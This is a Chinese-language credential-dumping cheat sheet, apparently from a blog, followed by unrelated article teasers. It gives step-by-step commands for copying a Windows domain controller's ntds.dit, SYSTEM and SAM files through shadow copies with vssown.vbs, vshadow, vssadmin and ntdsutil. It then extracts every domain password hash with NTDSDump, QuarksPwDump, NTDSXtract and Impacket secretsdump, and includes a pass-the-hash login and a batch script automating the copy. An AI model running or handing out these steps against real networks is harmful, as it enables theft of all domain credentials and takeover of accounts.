1.vsssown.vbs拷贝域数据库:

1.1上传vssown.vbs文件

上传cscript.exe和vssown.vbs到域服务器上

1.2创建快照

reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NTDS\Parameters        //得到ntds的默认路径:c:\ Windows\NTDS\ntds.dit

cd 桌面

cscript //nologo vssown.vbs /start          //启用

cscript //nologo vssown.vbs /status       //查看运行状态

cscript //nologo vssown.vbs /create C        //在C盘下创建副本卷影

cscript //nologo vssown.vbs /list >d:\jy.txt   //查看创建的快照信息并输出到d:\jy.txt

1.3获取域据库ntds.dit

copy  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit d:               //拷贝ntds.dit到D盘,有时候ntds.dit不在默认路径,需要通过注册表查询到路径

copy  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SYSTEM d:               //拷贝system到D盘

copy  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM d:          //拷贝sam到D盘

cscript //nologo vssown.vbs /delete {B3475A72-86D2-48EC-A22F-6E8DBB82903D}                    //删除卷影

2.vshadow.exe拷贝域数据库:

vshadow.exe -exec=%ComSpec% C:       //在C盘下创建副本卷影

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\system  d:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\ntds\ntds.dit           d:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM    d:

3.vssadmin拷贝域数据库:

vssadmin create shadow /for=c:     //在C盘下创建副本卷影

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\NTDS\ntds.dit             d:\ntds.dit

copy  \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\Windows\System32\config\SYSTEM   d:\system.hive

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\system32\config\SAM        d:\sam

4.NTDSDump导出域数据库hash值:

4.1 ntsdump命令帮助

ntdsdump.exe <-f ntds.dit> <-k HEX-SYS-KEY | -s system.hiv> [-o out.txt] [-h] [-t JOHN|LC]

-f    ntds.dit路径

-k   可选的十六进制格式的SYSKEY

-s    可选的system.hiv路径

-h   导出历史密码记录

-t    导出格式,LC或JOHN

-o   导出到指定文件中

4.2 ntdsdump快速导出hash值

NTDSDump.exe -f ntds.dit -s SYSTEM   -h  -t  john(或者lc)   -o SecPulseHash.txt     //快速导出HASH值

5.ntdsutil.exe + QuarksPwDump.exe导出hash值:

5.1quarkspwdump命令帮助

-dhl 导出本地哈希值

-dhdc导出内存中的域控哈希值

-dhd 导出域控哈希值,必须指定NTDS文件

-db 导出Bitlocker信息,必须指定NTDS文件

-nt 导出ntds文件

-hist 导出历史信息,可选项

-t 导出类型可选默认导出为John类型。

-o 导出文件到本地

QuarksPwDumpv0.2b.exe -dhl -o bk.txt  //导出本地哈希值到当前目录的bk.tx

quarks-pwdump.exe --dump-hash-domain --with-history //导出本机域控历史存储的hash值

quarks-pwdump.exe --dump-bitlocker --output c:\bitlocker.txt --ntds-file c:\ntds.dit

5.2创建快照:

ntdsutil snapshot  "activate  instance ntds"  create  quit quit 

5.3 Ntdsutil挂载域快照:

ntdsutil snapshot  "mount{a0455f6c-40c3-4b56-80a0-80261471522c}" quit  quit

快照 {5e0d92d3-992d-42b9-bbd5-9c85e5dc7827} 已掛接為 C:\$SNAP_201212082315_VOLUMEC$\

5.4 复制快照

copy C:\$SNAP_201212082315_VOLUMEC$\windows\NTDS\ntds.dit  c:\ntds.dit

5.5 卸载快照:

ntdsutil snapshot  "unmount{5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit  quit

5.6 删除快照

ntdsutil snapshot  "delete{5e0d92d3-992d-42b9-bbd5-9c85e5dc7827}" quit  quit

ntsutil.exe +PWPR(Passcape Windows Password Recovery)

5.7ntdsutil导出ntds.dit和system

 #ntdsutil 

    #snapshot

    #activate instance ntds

    #create

    #mount {GUID}

    copy c:\{挂载点}\WINDOWS\NTDS\NTDS.dit c:\NTDS_saved.dit (可手动复制)(新窗口复制)

    copy c:\{挂载点}\WINDOWS\system32\config\system c:\system

    #unmount {GUID} 

    #delete {GUID}

    #quit

    #quit 

最后通过PWPR(Passcape Windows Password Recovery)的GPU本地在线破解hash值

5.7 域控上执行导出hash值:

QuarksPwDump.exe --dump-hash-domain --ntds-file  c:\ntds.dit  --output  SecPulseHash.txt    //建议在域控制器上执行,不然会下载下来出错

QuarksPwDump.exe -dhd -hist -nt ntds.dit -o log.txt  //修复离线下载的ntds.dit

5.8 导出system文件

reg save hklm\system system.hive   //导出system文件

5.9离线下载本地导出hash值

quarks-pwdump.exe --dump-hash-domain  --ntds-file  C:\pentest\NTDS.dit -sf C:\pentest\SYSTEM -o hashes.txt  //离线导出ntds.dit的hash值

6.libesedb+ NtdsXtract导出域数据库hash值:

6.1 ubuntu上安装libesedb的先决条件:

sudo apt install autoconf automake autopoint libtool pkg-config   //安装先决条件 

6.2 安装libesedb:

git clone https://github.com/libyal/libesedb.git

cd libesedb/

./synclibs.sh

./autogen.sh

./configure

make

sudo make install     //默认安装在/usr/local/bin下

ldconfig

6.3 分离ntds.dit数据库

root@kali:/usr/local/bin# esedbexport -m tables /opt/ntds.dit   // 将ntds.dit和sam以及system下载到本地kali桌面中的hashdumpwork目录下,然后分离出数据表来,会在目录下生

成一个目录ntds.dit.export的文件夹

7.4安装NTDSXtract

wget https://github.com/csababarta/ntdsxtract/archive/e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip

unzip e2fc6470cf54d9151bed394ce9ad3cd25be7c262.zip

cd ntdsxtract-e2fc6470cf54d9151bed394ce9ad3cd25be7c262/

python setup.py install

7.5 ntds脚本导出hash值

root@kali:# python dsusers.py /usr/local/bin/ntds.dit.export/datatable. /usr/local/bin/ntds.dit.export/link_table. /root/Desktop/hashdumpwork   --syshive /root/Desktop/SYSTEM --passwordhashes --lmoutfile /root/Desktop/lm-out.txt --ntoutfile /root/Desktop/nt-out.txt --pwdformat ophc(或者john)

7. Impacket's secretsdump导出域数据库hash值:

python secretsdump.py  -ntds  /opt/ntds.dit  -system  /opt/system.hive  local

7.1 Impacket's secretsdump脚本域hash传递登录:

python secretsdump.py  -hashes  :f9bccbbbdkkkkkkddjjjkkjfjjggj bk/bk.org@192.168.1.100 

8.附录

附录:批处理导出ntds.dit文件

setlocal

@REM test if we are called by VSHADOW

if NOT “%CALLBACK_SCRIPT%”==”” goto :IS_CALLBACK

@REM

@REM Get the source and destination path

@REM

set SOURCE_DRIVE_LETTER=%~d1

set SOURCE_RELATIVE_PATH=%~pnx1

set DESTINATION_PATH=%

@REM

@REM Create the shadow copy – and generate env variables into a temporary script.

@REM

@REM Then, while the shadow is still live

@REM recursively execute the same script.

@REM

@echo …Determine the scripts to be executed/generated…

set CALLBACK_SCRIPT=%~dpnx0

set TEMP_GENERATED_SCRIPT=GeneratedVarsTempScript.cmd

@echo …Creating the shadow copy…

%~dp0\vshadow.exe -script=%TEMP_GENERATED_SCRIPT% -exec=%CALLBACK_SCRIPT% %SOURCE_DRIVE_LETTER%

del /f %TEMP_GENERATED_SCRIPT%

@goto :EOF

:IS_CALLBACK

setlocal

@REM

@REM This generated script should set the SHADOW_DEVICE_1 env variable

@REM

@echo …Obtaining the shadow copy device name…

call %TEMP_GENERATED_SCRIPT%

@REM

@REM This should copy the file to the right location

@REM

@echo …Copying from the shadow copy to the destination path…

copy “%SHADOW_DEVICE_1%\%SOURCE_RELATIVE_PATH%” %DESTINATION_PATH%

  

域hash值破解的总结经验的更多相关文章

  1. Hash值破解工具Hashcat使用

    Hash值破解工具Hashcat使用 Hashcat介绍 HashCat系列软件拥有十分灵活的破解方式,可以满足绝大多数的破解需求. Hashcat系列软件是比较牛逼的密码破解软件,系列软件包含Has ...

  2. Hash值破解工具(findmyhash与hash-identifier破解Hash值)

    Hash值破解工具(findmyhash与hash-identifier破解Hash值) 前言: Kali Linux提供各种哈希密文破解工具,如hashcat.john.rainbows.不论哪一种 ...

  3. 获取域hash并破解

    ntds.dit ntds.dit是主要的AD数据库,存放在C:\Windows\NTDS\NTDS.dit,包括有关域用户,组和组成员身份的信息.它还包括域中所有用户的密码哈希值.为了进一步保护密码 ...

  4. HASH暴力破解工具-Hashcat

    乌云网看到一篇文章讲述hashcat的使用简介(戳这里),对使用字典破解MD5内容 简单在kali上尝试了一下. (1)首先查看了下hashcat的帮助文档,简单截取了其中的部分常用说明. hashc ...

  5. IOS9.0中hash值的bug与解决方案

    事件起因 事情是这样的:产品上线发布,突然出现了问题.运营Gg过来反应,当场给露珠演示,运营同事的手机是iphone,bug确实是存在的.奇怪的是露珠用了其他iphone手机(借别人的,露珠的是吊死安 ...

  6. 错误记录:html隐藏域的值存字符串时出错

    问题 webform在后台给前台传值.  <input type="hidden" value="<%=userType %>" id=&qu ...

  7. bt 介绍以及 bt 种子的hash值(特征值)计算

    bt种子的hansh值计算,近期忽然对bt种子感兴趣了(原因勿问) 1. bt种子(概念) bt 是一个分布式文件分发协议,每一个文件下载者在下载的同一时候向其他下载者不断的上传已经下载的数据,这样保 ...

  8. JAVA-读取文件部分内容计算HASH值

    对于一些大文件,有时会需要计算部分内容的Hash,下面的函数计算了 文件头尾各1M,中间跳跃100M取10K 以及文件大小的Hash值 public static String CalHash(Str ...

  9. Java 获取字符串Hash值

    Java 生成字符串的Hash值: /** * A hashing method that changes a string (like a URL) into a hash suitable for ...

随机推荐

  1. 从python容器中随机选取元素

    # 1.使用python random模块的choice方法随机选择某个元素 import random foo = ['a', 'b', 'c', 'd', 'e'] from random imp ...

  2. VGGnet——从TFrecords制作到网络训练

    作为一个小白中的小白,多折腾总是有好处的,看了入门书和往上一些教程,很多TF的教程都是从MNIST数据集入手教小白入TF的大门,都是直接import MNIST,然后直接构建网络,定义loss和opt ...

  3. openstack系列文章(一)

    学习openstack的系列文章-虚拟化 虚拟化 KVM CPU 虚拟化 KVM 内存虚拟化 全虚拟化 I/O 设备 半虚拟化 I/O 设备 I/O PCI PCIe 设备直接分配 SR-IOV 在 ...

  4. 1042 Shuffling Machine

    一.题目描述 Shuffling is a procedure used to randomize a deck of playing cards. Because standard shufflin ...

  5. PSP Daily新增功能说明书

    1.选择输入类别时可以记录原来的输入,支持用户选择记录清空功能 2.添加“恢复最近”button,点击这个按钮可以跳出一个页面显示最近的excel记录,用户可以通过勾选相应的excel文件名,恢复选中 ...

  6. Scrum Meeting 10.28

    今天大部分同学仍停留在学习阶段,进度快的同学已经在配置SQLserver. 成员 今日完成任务 明日计划 所用时间 徐越 配置SQLserver,试用java程序连接数据库 学习servlet,htt ...

  7. Task 6.4 冲刺Two之站立会议3

    今天我参考各种聊天软件的主界面,仿照他们的形式对其中的界面和功能进行设置.重新完善了一下昨天完成的主要功能结构的框架.将各个功能按钮分别放到相应的位置,使界面看起来更加地合理,易于接受.

  8. IO异常 的处理 test

    package com.throwsss; import java.io.File; import java.io.FileInputStream; import java.io.FileNotFou ...

  9. 软工实践-Beta 冲刺 (7/7)

    队名:起床一起肝活队 组长博客:博客链接 作业博客:班级博客本次作业的链接 组员情况 组员1(队长):白晨曦 过去两天完成了哪些任务 描述: 1.界面的修改与完善 展示GitHub当日代码/文档签入记 ...

  10. Leetcode题库——31.下一个排列

    @author: ZZQ @software: PyCharm @file: nextPermutation.py @time: 2018/11/12 15:32 要求: 实现获取下一个排列的函数,算 ...